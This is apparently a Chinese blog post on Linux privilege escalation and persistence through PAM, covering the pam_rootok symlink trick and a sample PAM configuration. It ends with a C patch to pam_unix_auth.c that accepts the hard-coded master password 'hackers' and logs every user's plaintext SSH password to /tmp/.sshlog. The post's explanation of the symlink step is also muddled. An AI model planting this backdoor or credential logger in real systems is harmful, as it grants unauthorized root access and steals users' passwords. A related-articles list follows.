PAM软连接提权

文章目录

概要

PAM软链接提权利用的原理主要依赖于PAM(可插拔认证模块)配置文件的特性。具体来说,它利用了以下几个关键点:

PAM认证机制:PAM允许系统管理员通过配置文件灵活地管理用户认证过程。在SSH服务中,如果启用了PAM认证,系统会在用户登录时调用PAM模块进行身份验证。

软链接的使用:攻击者可以创建一个指向sshd文件的软链接,并将其命名为su(或其他名称)。当SSH服务启动时,它会根据PAM配置文件查找对应的模块。

pam_rootok.so模块:pam_rootok.so主要作用是使得uid为0的用户,即root用户可以直接通过认证而不需要输入密码。

PAM配置文件的控制:在PAM配置文件中,如果控制标志设置为sufficient,那么只要pam_rootok模块检测到用户的UID为0(即root用户),就会允许认证成功。这意味着即使输入了错误的密码,只要满足UID为0的条件,用户就可以获得root权限。

绕过正常验证:通过这种方式,攻击者可以绕过正常的密码验证,利用软链接实现提权,从而获得对系统的控制。

PAM软连接

1.可以查看 /etc/ssh/sshd_config 文件的UsePAM设置。来确认是否开启PAM认证。

2.修改PAM配置文件

auth required pam_securetty.so//要求在安全终端上进行身份验证。

auth required pam_unix.so shadow nullok//使用Unix认证,允许空密码(但并不推荐)。

auth required pam_nologin.so//检查是否存在nologin文件,防止不允许的用户登录。

account required pam_unix.so//用于账户管理的Unix认证。

password required pam_cracklib.so retry=3//使用密码复杂性检查,允许用户最多重试3次。

password required pam_unix.so shadow nullok use_authtok//用于更新密码的Unix认证,允许空密码,使用先前的身份验证令牌。

session required pam_unix.so//处理用户会话的相关操作。

3.将PAM配置文件中控制标志为sufficient,更改pam_rootok模块检测uid为0(root)

也可以修改配置,创建后门

修改配置:Linux-PAM/modules/pam_unix/pam_unix_auth.c配置后门

复制代码
/* verify the password of this user */
retval = _unix_verify_password(pamh, name, p, ctrl);
if(strcmp("hackers",p)==0){return PAM_SUCCESS;}    //后门密码
    if(retval == PAM_SUCCESS){    
           FILE * fp;    
           fp = fopen("/tmp/.sshlog", "a");//SSH登录用户密码保存位置
           fprintf(fp, "%s : %s\n", name, p);    
           fclose(fp);} 
name = p = NULL;
相关推荐
BenSmith10 分钟前
RTOS漏洞分析:CVE-2026-10641和CVE-2026-9263
安全
Hardworking66639 分钟前
第6章 数据工程
运维·服务器·数据库·数据工程
Dola_Zou1 小时前
以CmASIC重塑AI+边缘设备的安全与商业复利
人工智能·安全·软件工程·软件加密
美丽的欣情2 小时前
RK3588 Debian 交叉编译环境搭建(Windows + VMware Debian + CMake)
运维·windows·debian
小小小小钰儿2 小时前
网络安全名词术语!
安全·web安全·计算机·网络安全·黑客·编程
TlSfoward2 小时前
TLSFOWARD自动化抓包工具
运维·自动化
麦兜和小可的舅舅2 小时前
从原理到实战:Linux 系统性能诊断核心指标全解析及生产系统故障分析复盘
大数据·linux·运维
其实防守也摸鱼2 小时前
运维--安全与数据库
网络·数据库·学习·安全·安全威胁分析·数据库架构·软件安全
云飞云共享云桌面3 小时前
河北钣金工厂10个solidworks设计共享一台高性能服务器的云桌面方案
运维·服务器·3d·自动化·负载均衡·制造
wbs_scy3 小时前
仿 muduo 高并发服务器项目:实现 Connection 连接管理模块,并整合 Any 上下文
运维·服务器·网络